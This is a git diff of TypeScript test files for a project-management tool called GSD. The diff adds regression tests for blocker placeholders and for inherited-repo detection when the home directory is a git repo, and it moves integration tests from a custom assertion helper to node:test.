+      assert.equal(verified, true,
+        "verifyExpectedArtifact should pass after writeBlockerPlaceholder updates DB status");
+    } finally {
+      if (isDbAvailable()) closeDatabase();
+    }
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('writeBlockerPlaceholder: does NOT update DB for non-execute-task types', async () => {
+  const base = createFixtureBase();
+  try {
+    const { openDatabase, closeDatabase, insertMilestone, insertSlice, getSlice, isDbAvailable } =
+      await import("../../gsd-db.ts");
+
+    const dbPath = join(base, ".gsd", "gsd.db");
+    mkdirSync(join(base, ".gsd", "milestones", "M001", "slices", "S01"), { recursive: true });
+
+    openDatabase(dbPath);
+    try {
+      insertMilestone({ id: "M001", title: "Test", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", title: "Slice", status: "active" });
+
+      // research-slice is NOT execute-task — DB should NOT be updated
+      writeBlockerPlaceholder("research-slice", "M001/S01", base, "idle recovery exhausted");
+
+      const slice = getSlice("M001", "S01");
+      assert.equal(slice?.status, "active",
+        "writeBlockerPlaceholder should not change DB status for non-execute-task types");
+    } finally {
+      if (isDbAvailable()) closeDatabase();
+    }
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('writeBlockerPlaceholder: updates DB slice status for complete-slice (#2653)', async () => {
+  const base = createFixtureBase();
+  try {
+    const { openDatabase, closeDatabase, insertMilestone, insertSlice, getSlice, isDbAvailable } =
+      await import("../../gsd-db.ts");
+
+    const dbPath = join(base, ".gsd", "gsd.db");
+    mkdirSync(join(base, ".gsd", "milestones", "M001", "slices", "S01"), { recursive: true });
+
+    openDatabase(dbPath);
+    try {
+      insertMilestone({ id: "M001", title: "Test", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", title: "Slice", status: "active" });
+
+      // complete-slice blocker should update slice DB status to "complete"
+      writeBlockerPlaceholder("complete-slice", "M001/S01", base, "context exhaustion recovery");
+
+      const slice = getSlice("M001", "S01");
+      assert.equal(slice?.status, "complete",
+        "writeBlockerPlaceholder must update DB slice status to 'complete' for complete-slice so dispatch guard unblocks downstream (#2653)");
+
+      // Verify the full chain works: verifyExpectedArtifact should return true
+      // (requires both UAT file and DB status = complete)
+      // Note: the placeholder writes a SUMMARY file, but complete-slice also needs UAT.
+      // The placeholder itself doesn't write UAT, so artifact verification may still fail
+      // for complete-slice — but the DB status is now correct, breaking the circular dep.
+    } finally {
+      if (isDbAvailable()) closeDatabase();
+    }
+  } finally {
+    cleanup(base);
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/integration/inherited-repo-home-dir.test.ts b/src/resources/extensions/gsd/tests/integration/inherited-repo-home-dir.test.ts
new file mode 100644
index 000000000..44e6e7aeb
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/integration/inherited-repo-home-dir.test.ts
@@ -0,0 +1,191 @@
+/**
+ * inherited-repo-home-dir.test.ts — Regression test for #2393.
+ *
+ * When the user's home directory IS a git repo (common with dotfile
+ * managers like yadm), isInheritedRepo() must not treat ~/.gsd (the
+ * global GSD state directory) as a project .gsd belonging to the home
+ * repo. Without the fix, isInheritedRepo() returns false for project
+ * subdirectories because it sees ~/.gsd and concludes the parent repo
+ * has already been initialised with GSD — causing the wrong project
+ * state to be loaded.
+ */
+
+import { describe, test, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import {
+  mkdtempSync,
+  mkdirSync,
+  rmSync,
+  writeFileSync,
+  realpathSync,
+  symlinkSync,
+} from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { execFileSync } from "node:child_process";
+
+import { isInheritedRepo } from "../../repo-identity.ts";
+
+function run(cmd: string, args: string[], cwd: string): string {
+  return execFileSync(cmd, args, {
+    cwd,
+    stdio: ["ignore", "pipe", "pipe"],
+    encoding: "utf-8",
+  }).trim();
+}
+
+describe("isInheritedRepo when git root is HOME (#2393)", () => {
+  let fakeHome: string;
+  let stateDir: string;
+  let origGsdHome: string | undefined;
+  let origGsdStateDir: string | undefined;
+
+  beforeEach(() => {
+    // Create a fake HOME that is itself a git repo (dotfile manager scenario).
+    fakeHome = realpathSync(mkdtempSync(join(tmpdir(), "gsd-home-repo-")));
+    run("git", ["init", "-b", "main"], fakeHome);
+    run("git", ["config", "user.name", "Test"], fakeHome);
+    run("git", ["config", "user.email", "test@example.com"], fakeHome);
+    writeFileSync(join(fakeHome, ".bashrc"), "# dotfiles\n", "utf-8");
+    run("git", ["add", ".bashrc"], fakeHome);
+    run("git", ["commit", "-m", "init dotfiles"], fakeHome);
+
+    // Create a plain ~/.gsd directory at fakeHome — this simulates the
+    // global GSD home directory, NOT a project .gsd.
+    mkdirSync(join(fakeHome, ".gsd", "projects"), { recursive: true });
+
+    // Save and override env. Point GSD_HOME at fakeHome/.gsd so the
+    // function recognizes it as the global state directory.
+    origGsdHome = process.env.GSD_HOME;
+    origGsdStateDir = process.env.GSD_STATE_DIR;
+    process.env.GSD_HOME = join(fakeHome, ".gsd");
+    stateDir = mkdtempSync(join(tmpdir(), "gsd-state-"));
+    process.env.GSD_STATE_DIR = stateDir;
+  });
+
+  afterEach(() => {
+    if (origGsdHome !== undefined) process.env.GSD_HOME = origGsdHome;
+    else delete process.env.GSD_HOME;
+    if (origGsdStateDir !== undefined) process.env.GSD_STATE_DIR = origGsdStateDir;
+    else delete process.env.GSD_STATE_DIR;
+
+    rmSync(fakeHome, { recursive: true, force: true });
+    rmSync(stateDir, { recursive: true, force: true });
+  });
+
+  test("subdirectory of home-as-git-root is detected as inherited even when ~/.gsd exists", () => {
+    // Create a project directory inside fake HOME
+    const projectDir = join(fakeHome, "projects", "my-app");
+    mkdirSync(projectDir, { recursive: true });
+
+    // The bug: isInheritedRepo sees ~/.gsd and returns false, thinking
+    // the home repo is a legitimate GSD project. It should return true
+    // because ~/.gsd is the global state dir, not a project .gsd.
+    assert.strictEqual(
+      isInheritedRepo(projectDir),
+      true,
+      "project inside home-as-git-root must be detected as inherited repo, " +
+      "even when ~/.gsd (global state dir) exists",
+    );
+  });
+
+  test("subdirectory with a real project .gsd symlink at git root is NOT inherited", () => {
+    // Simulate a legitimately initialised GSD project at the home repo root:
+    // .gsd is a symlink to an external state directory.
+    const externalState = join(stateDir, "projects", "home-project");
+    mkdirSync(externalState, { recursive: true });
+    const gsdDir = join(fakeHome, ".gsd");
+
+    // Remove the plain directory and replace with a symlink (real project .gsd)
+    rmSync(gsdDir, { recursive: true, force: true });
+    symlinkSync(externalState, gsdDir);
+
+    const projectDir = join(fakeHome, "projects", "my-app");
+    mkdirSync(projectDir, { recursive: true });
+
+    // When .gsd at root IS a project symlink, subdirectories are legitimate children
+    assert.strictEqual(
+      isInheritedRepo(projectDir),
+      false,
+      "subdirectory of a legitimately-initialised GSD project should NOT be inherited",
+    );
+  });
+
+  test("home-as-git-root itself is never inherited", () => {
+    assert.strictEqual(
+      isInheritedRepo(fakeHome),
+      false,
+      "the git root itself is never inherited",
+    );
+  });
+});
+
+describe("isInheritedRepo with stale .gsd at parent git root", () => {
+  let parentRepo: string;
+
+  beforeEach(() => {
+    parentRepo = realpathSync(mkdtempSync(join(tmpdir(), "gsd-stale-parent-")));
+    run("git", ["init", "-b", "main"], parentRepo);
+    run("git", ["config", "user.name", "Test"], parentRepo);
+    run("git", ["config", "user.email", "test@example.com"], parentRepo);
+    writeFileSync(join(parentRepo, "README.md"), "# Parent\n", "utf-8");
+    run("git", ["add", "README.md"], parentRepo);
+    run("git", ["commit", "-m", "init"], parentRepo);
+  });
+
+  afterEach(() => {
+    rmSync(parentRepo, { recursive: true, force: true });
+  });
+
+  test("stale .gsd dir at parent git root does not suppress inherited detection", () => {
+    // Simulate a stale .gsd directory at the parent git root (e.g. from a
+    // prior doctor run or accidental init). This is a real directory, NOT
+    // a symlink, and NOT the global GSD home.
+    mkdirSync(join(parentRepo, ".gsd"), { recursive: true });
+
+    const projectDir = join(parentRepo, "my-project");
+    mkdirSync(projectDir, { recursive: true });
+
+    // Without fix: isProjectGsd(join(root, ".gsd")) returns true because
+    // the stale .gsd is a real directory that isn't the global GSD home,
+    // causing isInheritedRepo to return false (false negative).
+    //
+    // The stale .gsd at parent is still treated as a "project .gsd" by
+    // isProjectGsd(), so the git root check at line 128 returns false.
+    // This is the expected behavior for that check — the defense-in-depth
+    // fix in auto-start.ts handles this case by checking for local .git.
+    //
+    // Verify the function behavior is consistent:
+    assert.strictEqual(
+      isInheritedRepo(projectDir),
+      false,
+      "stale .gsd dir at git root still causes isInheritedRepo to return false " +
+      "(defense-in-depth in auto-start.ts handles this case)",
+    );
+  });
+
+  test("basePath's own .gsd symlink does not suppress inherited detection", () => {
+    // Create a project subdir with its own .gsd symlink (set up during
+    // the discuss phase, before auto-mode bootstrap runs).
+    const projectDir = join(parentRepo, "my-project");
+    mkdirSync(projectDir, { recursive: true });
+
+    const externalState = mkdtempSync(join(tmpdir(), "gsd-ext-state-"));
+    symlinkSync(externalState, join(projectDir, ".gsd"));
+
+    // Before fix: the walk-up loop started at normalizedBase (projectDir),
+    // found .gsd at projectDir, and returned false — even though projectDir
+    // has no .git of its own. The .gsd at basePath is irrelevant to whether
+    // the git repo is inherited from a parent.
+    //
+    // After fix: the walk-up starts at dirname(normalizedBase), skipping
+    // basePath's own .gsd.
+    assert.strictEqual(
+      isInheritedRepo(projectDir),
+      true,
+      "project's own .gsd symlink must not suppress inherited repo detection",
+    );
+
+    rmSync(externalState, { recursive: true, force: true });
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/integration-lifecycle.test.ts b/src/resources/extensions/gsd/tests/integration/integration-lifecycle.test.ts
similarity index 70%
rename from src/resources/extensions/gsd/tests/integration-lifecycle.test.ts
rename to src/resources/extensions/gsd/tests/integration/integration-lifecycle.test.ts
index 3cb94b765..453ffcbbc 100644
--- a/src/resources/extensions/gsd/tests/integration-lifecycle.test.ts
+++ b/src/resources/extensions/gsd/tests/integration/integration-lifecycle.test.ts
@@ -12,18 +12,17 @@ import { mkdtempSync, mkdirSync, rmSync, writeFileSync, readFileSync, appendFile
 import { join } from 'node:path';
 import { tmpdir } from 'node:os';
 
-import { openDatabase, closeDatabase, isDbAvailable, _getAdapter } from '../gsd-db.ts';
-import { migrateFromMarkdown, parseDecisionsTable } from '../md-importer.ts';
+import { openDatabase, closeDatabase, isDbAvailable, _getAdapter } from '../../gsd-db.ts';
+import { migrateFromMarkdown, parseDecisionsTable } from '../../md-importer.ts';
 import {
   queryDecisions,
   queryRequirements,
   formatDecisionsForPrompt,
   formatRequirementsForPrompt,
-} from '../context-store.ts';
-import { saveDecisionToDb, generateDecisionsMd } from '../db-writer.ts';
-import { createTestContext } from './test-helpers.ts';
-
-const { assertEq, assertTrue, assertMatch, report } = createTestContext();
+} from '../../context-store.ts';
+import { saveDecisionToDb, generateDecisionsMd } from '../../db-writer.ts';
+import { describe, test, beforeEach, afterEach } from 'node:test';
+import assert from 'node:assert/strict';
 
 // ─── Fixture Generators (duplicated from token-savings.test.ts — file-scoped) ──
 
@@ -119,10 +118,7 @@ const ROADMAP_CONTENT = `# M001: Test Milestone\n\n**Vision:** Integration test
 // Full Lifecycle Integration Test
 // ═══════════════════════════════════════════════════════════════════════════
 
-async function main(): Promise<void> {
-
-  console.log('\n=== integration-lifecycle: full pipeline ===');
-  {
+test('integration-lifecycle: full pipeline', async () => {
     // ── Step 1: Set up temp dir with realistic .gsd/ structure ──────────
     const base = mkdtempSync(join(tmpdir(), 'gsd-int-lifecycle-'));
     const gsdDir = join(base, '.gsd');
@@ -142,37 +138,37 @@ async function main(): Promise<void> {
     try {
       // ── Step 2: Open file-backed DB + migrateFromMarkdown ──────────────
       openDatabase(dbPath);
-      assertTrue(isDbAvailable(), 'lifecycle: DB is available after open');
+      assert.ok(isDbAvailable(), 'lifecycle: DB is available after open');
 
       const result = migrateFromMarkdown(base);
 
-      assertTrue(result.decisions === DECISIONS_COUNT, `lifecycle: imported ${result.decisions} decisions, expected ${DECISIONS_COUNT}`);
-      assertTrue(result.requirements === REQUIREMENTS_COUNT, `lifecycle: imported ${result.requirements} requirements, expected ${REQUIREMENTS_COUNT}`);
-      assertTrue(result.artifacts >= 1, `lifecycle: imported at least 1 artifact (got ${result.artifacts})`);
+      assert.ok(result.decisions === DECISIONS_COUNT, `lifecycle: imported ${result.decisions} decisions, expected ${DECISIONS_COUNT}`);
+      assert.ok(result.requirements === REQUIREMENTS_COUNT, `lifecycle: imported ${result.requirements} requirements, expected ${REQUIREMENTS_COUNT}`);
+      assert.ok(result.artifacts >= 1, `lifecycle: imported at least 1 artifact (got ${result.artifacts})`);
 
       // Verify file-backed DB uses WAL
       const adapter = _getAdapter()!;
       const mode = adapter.prepare('PRAGMA journal_mode').get();
-      assertEq(mode?.['journal_mode'], 'wal', 'lifecycle: file-backed DB uses WAL mode');
+      assert.deepStrictEqual(mode?.['journal_mode'], 'wal', 'lifecycle: file-backed DB uses WAL mode');
 
       // ── Step 3: Scoped queries — decisions by milestone ────────────────
       const allDecisions = queryDecisions();
       const m001Decisions = queryDecisions({ milestoneId: 'M001' });
       const m002Decisions = queryDecisions({ milestoneId: 'M002' });
 
-      assertTrue(allDecisions.length === DECISIONS_COUNT, `lifecycle: all decisions count = ${DECISIONS_COUNT} (got ${allDecisions.length})`);
-      assertTrue(m001Decisions.length > 0, 'lifecycle: M001 decisions non-empty');
-      assertTrue(m002Decisions.length > 0, 'lifecycle: M002 decisions non-empty');
-      assertTrue(m001Decisions.length < allDecisions.length, 'lifecycle: M001 filtered count < total count');
-      assertTrue(m002Decisions.length < allDecisions.length, 'lifecycle: M002 filtered count < total count');
-      assertEq(m001Decisions.length + m002Decisions.length, allDecisions.length, 'lifecycle: M001 + M002 = total decisions');
+      assert.ok(allDecisions.length === DECISIONS_COUNT, `lifecycle: all decisions count = ${DECISIONS_COUNT} (got ${allDecisions.length})`);
+      assert.ok(m001Decisions.length > 0, 'lifecycle: M001 decisions non-empty');
+      assert.ok(m002Decisions.length > 0, 'lifecycle: M002 decisions non-empty');
+      assert.ok(m001Decisions.length < allDecisions.length, 'lifecycle: M001 filtered count < total count');
+      assert.ok(m002Decisions.length < allDecisions.length, 'lifecycle: M002 filtered count < total count');
+      assert.deepStrictEqual(m001Decisions.length + m002Decisions.length, allDecisions.length, 'lifecycle: M001 + M002 = total decisions');
 
       // Verify scoping correctness
       for (const d of m001Decisions) {
-        assertTrue(d.when_context.includes('M001'), `lifecycle: M001 decision ${d.id} has M001 in when_context`);
+        assert.ok(d.when_context.includes('M001'), `lifecycle: M001 decision ${d.id} has M001 in when_context`);
       }
       for (const d of m002Decisions) {
-        assertTrue(d.when_context.includes('M002'), `lifecycle: M002 decision ${d.id} has M002 in when_context`);
+        assert.ok(d.when_context.includes('M002'), `lifecycle: M002 decision ${d.id} has M002 in when_context`);
       }
 
       // ── Step 4: Scoped queries — requirements by slice ─────────────────
@@ -180,19 +176,19 @@ async function main(): Promise<void> {
       const s01Requirements = queryRequirements({ sliceId: 'S01' });
       const s04Requirements = queryRequirements({ sliceId: 'S04' });
 
-      assertTrue(allRequirements.length === REQUIREMENTS_COUNT, `lifecycle: all requirements count = ${REQUIREMENTS_COUNT} (got ${allRequirements.length})`);
-      assertTrue(s01Requirements.length > 0, 'lifecycle: S01 requirements non-empty');
-      assertTrue(s04Requirements.length > 0, 'lifecycle: S04 requirements non-empty');
-      assertTrue(s01Requirements.length < allRequirements.length, 'lifecycle: S01 filtered count < total count');
+      assert.ok(allRequirements.length === REQUIREMENTS_COUNT, `lifecycle: all requirements count = ${REQUIREMENTS_COUNT} (got ${allRequirements.length})`);
+      assert.ok(s01Requirements.length > 0, 'lifecycle: S01 requirements non-empty');
+      assert.ok(s04Requirements.length > 0, 'lifecycle: S04 requirements non-empty');
+      assert.ok(s01Requirements.length < allRequirements.length, 'lifecycle: S01 filtered count < total count');
 
       // ── Step 5: Format + token savings validation ──────────────────────
       const formattedDecisions = formatDecisionsForPrompt(m001Decisions);
       const formattedRequirements = formatRequirementsForPrompt(s01Requirements);
 
-      assertTrue(formattedDecisions.length > 0, 'lifecycle: formatted M001 decisions non-empty');
-      assertTrue(formattedRequirements.length > 0, 'lifecycle: formatted S01 requirements non-empty');
-      assertMatch(formattedDecisions, /\| D/, 'lifecycle: formatted decisions contains decision rows');
-      assertMatch(formattedRequirements, /### R\d+/, 'lifecycle: formatted requirements has headings');
+      assert.ok(formattedDecisions.length > 0, 'lifecycle: formatted M001 decisions non-empty');
+      assert.ok(formattedRequirements.length > 0, 'lifecycle: formatted S01 requirements non-empty');
+      assert.match(formattedDecisions, /\| D/, 'lifecycle: formatted decisions contains decision rows');
+      assert.match(formattedRequirements, /### R\d+/, 'lifecycle: formatted requirements has headings');
 
       // Token savings: scoped output vs full file content
       const fullDecisionsContent = readFileSync(join(gsdDir, 'DECISIONS.md'), 'utf-8');
@@ -203,24 +199,24 @@ async function main(): Promise<void> {
 
       console.log(`  Token savings: ${savingsPercent.toFixed(1)}% (scoped: ${dbScopedTotal}, full: ${fullTotal})`);
 
-      assertTrue(dbScopedTotal > 0, 'lifecycle: scoped content non-empty');
-      assertTrue(dbScopedTotal < fullTotal, 'lifecycle: scoped content smaller than full content');
-      assertTrue(savingsPercent >= 30, `lifecycle: savings ≥30% (actual: ${savingsPercent.toFixed(1)}%)`);
+      assert.ok(dbScopedTotal > 0, 'lifecycle: scoped content non-empty');
+      assert.ok(dbScopedTotal < fullTotal, 'lifecycle: scoped content smaller than full content');
+      assert.ok(savingsPercent >= 30, `lifecycle: savings ≥30% (actual: ${savingsPercent.toFixed(1)}%)`);
 
       // ── Step 6: Simulate content change → re-import ────────────────────
       const newDecisionRow = `| D${DECISIONS_COUNT + 1} | M001/S01 | testing | new decision added after initial import | choice X | rationale Y | yes |`;
       appendFileSync(join(gsdDir, 'DECISIONS.md'), '\n' + newDecisionRow + '\n');
 
       const result2 = migrateFromMarkdown(base);
-      assertTrue(result2.decisions === DECISIONS_COUNT + 1, `lifecycle: re-import got ${result2.decisions} decisions, expected ${DECISIONS_COUNT + 1}`);
+      assert.ok(result2.decisions === DECISIONS_COUNT + 1, `lifecycle: re-import got ${result2.decisions} decisions, expected ${DECISIONS_COUNT + 1}`);
 
       const afterReimport = queryDecisions();
-      assertTrue(afterReimport.length === DECISIONS_COUNT + 1, `lifecycle: DB has ${DECISIONS_COUNT + 1} decisions after re-import (got ${afterReimport.length})`);
+      assert.ok(afterReimport.length === DECISIONS_COUNT + 1, `lifecycle: DB has ${DECISIONS_COUNT + 1} decisions after re-import (got ${afterReimport.length})`);
 
       // Verify the new decision is queryable
       const newM001 = queryDecisions({ milestoneId: 'M001' });
       const foundNew = newM001.some(d => d.id === `D${DECISIONS_COUNT + 1}`);
-      assertTrue(foundNew, `lifecycle: newly imported D${DECISIONS_COUNT + 1} found in M001 scope`);
+      assert.ok(foundNew, `lifecycle: newly imported D${DECISIONS_COUNT + 1} found in M001 scope`);
 
       // ── Step 7: saveDecisionToDb write-back + round-trip ───────────────
       const saved = await saveDecisionToDb(
@@ -234,44 +230,37 @@ async function main(): Promise<void> {
         base,
       );
 
-      assertTrue(typeof saved.id === 'string', 'lifecycle: saveDecisionToDb returned an id');
-      assertMatch(saved.id, /^D\d+$/, 'lifecycle: saved ID matches D### pattern');
+      assert.ok(typeof saved.id === 'string', 'lifecycle: saveDecisionToDb returned an id');
+      assert.match(saved.id, /^D\d+$/, 'lifecycle: saved ID matches D### pattern');
 
       // Query back from DB
       const allAfterSave = queryDecisions();
       const savedDecision = allAfterSave.find(d => d.id === saved.id);
-      assertTrue(savedDecision !== null && savedDecision !== undefined, `lifecycle: saved decision ${saved.id} found in DB`);
-      assertEq(savedDecision?.decision, 'integration test write-back decision', 'lifecycle: saved decision text matches');
-      assertEq(savedDecision?.choice, 'option Z', 'lifecycle: saved choice matches');
+      assert.ok(savedDecision !== null && savedDecision !== undefined, `lifecycle: saved decision ${saved.id} found in DB`);
+      assert.deepStrictEqual(savedDecision?.decision, 'integration test write-back decision', 'lifecycle: saved decision text matches');
+      assert.deepStrictEqual(savedDecision?.choice, 'option Z', 'lifecycle: saved choice matches');
 
       // Verify DECISIONS.md was regenerated with the new decision
       const regeneratedMd = readFileSync(join(gsdDir, 'DECISIONS.md'), 'utf-8');
-      assertTrue(regeneratedMd.includes(saved.id), `lifecycle: regenerated DECISIONS.md contains ${saved.id}`);
-      assertTrue(regeneratedMd.includes('integration test write-back decision'), 'lifecycle: regenerated md contains write-back text');
+      assert.ok(regeneratedMd.includes(saved.id), `lifecycle: regenerated DECISIONS.md contains ${saved.id}`);
+      assert.ok(regeneratedMd.includes('integration test write-back decision'), 'lifecycle: regenerated md contains write-back text');
 
       // Round-trip: parse regenerated markdown back → verify field fidelity
       const reparsed = parseDecisionsTable(regeneratedMd);
       const reparsedSaved = reparsed.find(d => d.id === saved.id);
-      assertTrue(reparsedSaved !== undefined, `lifecycle: reparsed markdown contains ${saved.id}`);
-      assertEq(reparsedSaved?.choice, 'option Z', 'lifecycle: round-trip choice preserved');
-      assertEq(reparsedSaved?.rationale, 'proves round-trip fidelity', 'lifecycle: round-trip rationale preserved');
+      assert.ok(reparsedSaved !== undefined, `lifecycle: reparsed markdown contains ${saved.id}`);
+      assert.deepStrictEqual(reparsedSaved?.choice, 'option Z', 'lifecycle: round-trip choice preserved');
+      assert.deepStrictEqual(reparsedSaved?.rationale, 'proves round-trip fidelity', 'lifecycle: round-trip rationale preserved');
 
       // ── Step 8: DB consistency — total count sanity ─────────────────────
       const finalCount = queryDecisions().length;
       // Original 14 + 1 re-import + 1 saveDecisionToDb = 16
-      assertTrue(finalCount === DECISIONS_COUNT + 2, `lifecycle: final DB count = ${DECISIONS_COUNT + 2} (got ${finalCount})`);
+      assert.ok(finalCount === DECISIONS_COUNT + 2, `lifecycle: final DB count = ${DECISIONS_COUNT + 2} (got ${finalCount})`);
 
       closeDatabase();
     } finally {
       closeDatabase();
       rmSync(base, { recursive: true, force: true });
     }
-  }
-
-  report();
-}
-
-main().catch((error) => {
-  console.error(error);
-  process.exit(1);
 });
+
diff --git a/src/resources/extensions/gsd/tests/integration-mixed-milestones.test.ts b/src/resources/extensions/gsd/tests/integration/integration-mixed-milestones.test.ts
similarity index 72%
rename from src/resources/extensions/gsd/tests/integration-mixed-milestones.test.ts
rename to src/resources/extensions/gsd/tests/integration/integration-mixed-milestones.test.ts
index b5e2e8de1..f640bb77d 100644
--- a/src/resources/extensions/gsd/tests/integration-mixed-milestones.test.ts
+++ b/src/resources/extensions/gsd/tests/integration/integration-mixed-milestones.test.ts
@@ -11,20 +11,20 @@ import { execSync } from 'node:child_process';
 import { join } from 'node:path';
 import { tmpdir } from 'node:os';
 
-import { deriveState } from '../state.ts';
-import { indexWorkspace } from '../workspace-index.ts';
-import { inlinePriorMilestoneSummary } from '../files.ts';
-import { getPriorSliceCompletionBlocker } from '../dispatch-guard.ts';
+import { deriveState } from '../../state.ts';
+import { indexWorkspace } from '../../workspace-index.ts';
+import { inlinePriorMilestoneSummary } from '../../files.ts';
+import { getPriorSliceCompletionBlocker } from '../../dispatch-guard.ts';
 import {
   getSliceBranchName,
   parseSliceBranch,
-} from '../worktree.ts';
-import { clearPathCache } from '../paths.ts';
-import { createTestContext } from './test-helpers.ts';
+} from '../../worktree.ts';
+import { clearPathCache } from '../../paths.ts';
+import { describe, test, beforeEach, afterEach } from 'node:test';
+import assert from 'node:assert/strict';
 
 // ─── Assertion Helpers ────────────────────────────────────────────────────
 
-const { assertEq, assertTrue, assertMatch, report } = createTestContext();
 // ─── Fixture Helpers ──────────────────────────────────────────────────────
 
 function createFixtureBase(): string {
@@ -79,11 +79,9 @@ function createGitRepo(): string {
 // Test Groups
 // ═══════════════════════════════════════════════════════════════════════════
 
-async function main(): Promise<void> {
-
   // ─── Group 1: deriveState with new-format-only milestones ─────────────
-  console.log('\n=== Group 1: deriveState with new-format-only milestones ===');
-  {
+
+test('Group 1: deriveState with new-format-only milestones', async () => {
     const base = createFixtureBase();
     try {
       // Create M001-abc123 with roadmap + 2 slices (S01 complete, S02 in-progress)
@@ -125,32 +123,32 @@ async function main(): Promise<void> {
       const state = await deriveState(base);
 
       // Phase should be executing (active milestone with incomplete slice + plan + tasks)
-      assertEq(state.phase, 'executing', 'G1: phase is executing');
-      assertTrue(state.activeMilestone !== null, 'G1: activeMilestone is not null');
-      assertEq(state.activeMilestone?.id, 'M001-abc123', 'G1: activeMilestone id is M001-abc123');
-      assertEq(state.activeMilestone?.title, 'Test Feature', 'G1: title stripped to Test Feature');
+      assert.deepStrictEqual(state.phase, 'executing', 'G1: phase is executing');
+      assert.ok(state.activeMilestone !== null, 'G1: activeMilestone is not null');
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M001-abc123', 'G1: activeMilestone id is M001-abc123');
+      assert.deepStrictEqual(state.activeMilestone?.title, 'Test Feature', 'G1: title stripped to Test Feature');
 
       // Registry
-      assertEq(state.registry.length, 1, 'G1: registry has 1 entry');
-      assertEq(state.registry[0]?.id, 'M001-abc123', 'G1: registry entry id');
-      assertEq(state.registry[0]?.status, 'active', 'G1: registry entry status is active');
-      assertEq(state.registry[0]?.title, 'Test Feature', 'G1: registry title stripped');
+      assert.deepStrictEqual(state.registry.length, 1, 'G1: registry has 1 entry');
+      assert.deepStrictEqual(state.registry[0]?.id, 'M001-abc123', 'G1: registry entry id');
+      assert.deepStrictEqual(state.registry[0]?.status, 'active', 'G1: registry entry status is active');
+      assert.deepStrictEqual(state.registry[0]?.title, 'Test Feature', 'G1: registry title stripped');
 
       // Active slice
-      assertTrue(state.activeSlice !== null, 'G1: activeSlice is not null');
-      assertEq(state.activeSlice?.id, 'S02', 'G1: activeSlice is S02');
+      assert.ok(state.activeSlice !== null, 'G1: activeSlice is not null');
+      assert.deepStrictEqual(state.activeSlice?.id, 'S02', 'G1: activeSlice is S02');
 
       // Progress
-      assertEq(state.progress?.milestones?.done, 0, 'G1: milestones done = 0');
-      assertEq(state.progress?.milestones?.total, 1, 'G1: milestones total = 1');
+      assert.deepStrictEqual(state.progress?.milestones?.done, 0, 'G1: milestones done = 0');
+      assert.deepStrictEqual(state.progress?.milestones?.total, 1, 'G1: milestones total = 1');
     } finally {
       cleanup(base);
     }
-  }
+});
 
   // ─── Group 2: deriveState with mixed-format milestones ────────────────
-  console.log('\n=== Group 2: deriveState with mixed old+new format milestones ===');
-  {
+
+test('Group 2: deriveState with mixed old+new format milestones', async () => {
     const base = createFixtureBase();
     try {
       // M001 — complete milestone (all slices done + summary)
@@ -217,40 +215,40 @@ Everything worked.
       const state = await deriveState(base);
 
       // Registry — should have 2 entries sorted by seq number
-      assertEq(state.registry.length, 2, 'G2: registry has 2 entries');
-      assertEq(state.registry[0]?.id, 'M001', 'G2: registry[0] is M001 (sorted first)');
-      assertEq(state.registry[1]?.id, 'M002-abc123', 'G2: registry[1] is M002-abc123 (sorted second)');
+      assert.deepStrictEqual(state.registry.length, 2, 'G2: registry has 2 entries');
+      assert.deepStrictEqual(state.registry[0]?.id, 'M001', 'G2: registry[0] is M001 (sorted first)');
+      assert.deepStrictEqual(state.registry[1]?.id, 'M002-abc123', 'G2: registry[1] is M002-abc123 (sorted second)');
 
       // M001 is complete
-      assertEq(state.registry[0]?.status, 'complete', 'G2: M001 status is complete');
-      assertEq(state.registry[0]?.title, 'Legacy Feature', 'G2: M001 title stripped');
+      assert.deepStrictEqual(state.registry[0]?.status, 'complete', 'G2: M001 status is complete');
+      assert.deepStrictEqual(state.registry[0]?.title, 'Legacy Feature', 'G2: M001 title stripped');
 
       // M002-abc123 is active
-      assertEq(state.registry[1]?.status, 'active', 'G2: M002-abc123 status is active');
-      assertEq(state.registry[1]?.title, 'New Feature', 'G2: M002-abc123 title stripped');
+      assert.deepStrictEqual(state.registry[1]?.status, 'active', 'G2: M002-abc123 status is active');
+      assert.deepStrictEqual(state.registry[1]?.title, 'New Feature', 'G2: M002-abc123 title stripped');
 
       // Active milestone
-      assertTrue(state.activeMilestone !== null, 'G2: activeMilestone is not null');
-      assertEq(state.activeMilestone?.id, 'M002-abc123', 'G2: activeMilestone is M002-abc123');
-      assertEq(state.activeMilestone?.title, 'New Feature', 'G2: activeMilestone title stripped');
+      assert.ok(state.activeMilestone !== null, 'G2: activeMilestone is not null');
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M002-abc123', 'G2: activeMilestone is M002-abc123');
+      assert.deepStrictEqual(state.activeMilestone?.title, 'New Feature', 'G2: activeMilestone title stripped');
 
       // Phase
-      assertEq(state.phase, 'executing', 'G2: phase is executing');
+      assert.deepStrictEqual(state.phase, 'executing', 'G2: phase is executing');
 
       // Active slice
-      assertEq(state.activeSlice?.id, 'S02', 'G2: activeSlice is S02');
+      assert.deepStrictEqual(state.activeSlice?.id, 'S02', 'G2: activeSlice is S02');
 
       // Progress
-      assertEq(state.progress?.milestones?.done, 1, 'G2: milestones done = 1');
-      assertEq(state.progress?.milestones?.total, 2, 'G2: milestones total = 2');
+      assert.deepStrictEqual(state.progress?.milestones?.done, 1, 'G2: milestones done = 1');
+      assert.deepStrictEqual(state.progress?.milestones?.total, 2, 'G2: milestones total = 2');
     } finally {
       cleanup(base);
     }
-  }
+});
 
   // ─── Group 3: indexWorkspace with mixed-format milestones ─────────────
-  console.log('\n=== Group 3: indexWorkspace with mixed-format milestones ===');
-  {
+
+test('Group 3: indexWorkspace with mixed-format milestones', async () => {
     const base = createFixtureBase();
     try {
       // Same fixture as Group 2: M001 (complete) + M002-abc123 (active)
@@ -304,39 +302,39 @@ Everything worked.
       const index = await indexWorkspace(base);
 
       // Both milestones indexed
-      assertEq(index.milestones.length, 2, 'G3: 2 milestones in index');
-      assertEq(index.milestones[0]?.id, 'M001', 'G3: index[0] is M001');
